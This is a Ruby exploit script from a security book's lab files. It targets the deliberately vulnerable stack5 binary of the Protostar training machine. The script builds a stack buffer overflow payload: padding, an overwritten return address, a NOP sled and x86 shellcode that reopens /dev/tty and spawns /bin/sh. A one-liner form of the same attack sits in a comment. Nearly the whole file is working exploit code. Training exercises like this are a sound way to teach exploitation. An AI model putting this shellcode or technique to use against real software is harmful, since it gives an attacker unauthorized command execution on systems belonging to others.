# -*- coding: binary -*-
#!/usr/bin/env ruby
# ========================================================= #
# This file is a part of { Black Hat Ruby } book lab files. #
# ========================================================= #
#
# Author:
#   Sabri Hassanyah | @KINGSABRI
# Description:
#   Exploiting the vulnerble application stack5 from Protostar(v2) machine
#   Download: https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/
#   Writeup: https://simonuvarov.com/protostar-stack5/
# Requirements:
#   Before executing the exploit, make sure you are using "bash" as "sh" is the default, otherwise, the exploit will not work as expected.
#   $ ruby -e "system('/bin/bash -i 2>&1')"
# 

# Exploit using oneliner to execute directely from terminal
# (ruby -e 'print "A" * 76 + [0xbffff6c0].pack("V") + "\x90" * 10 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat;) | /opt/protostar/bin/stack5

junk    = "A" * 76
eip     = [0xbffff6c0].pack("V")
nops    = "\x90" * 10
payload = "\x31\xc0\x31\xdb\xb0\x06\xcd" +
          "\x80\x53\x68/tty\x68/dev\x89" +
          "\xe3\x31\xc9\x66\xb9\x12\x27" +
          "\xb0\x05\xcd\x80\x31\xc0\x50" +
          "\x68//sh\x68/bin\x89\xe3\x50" +
          "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
exploit = junk + eip + nops + payload
print "#{exploit};cat;"
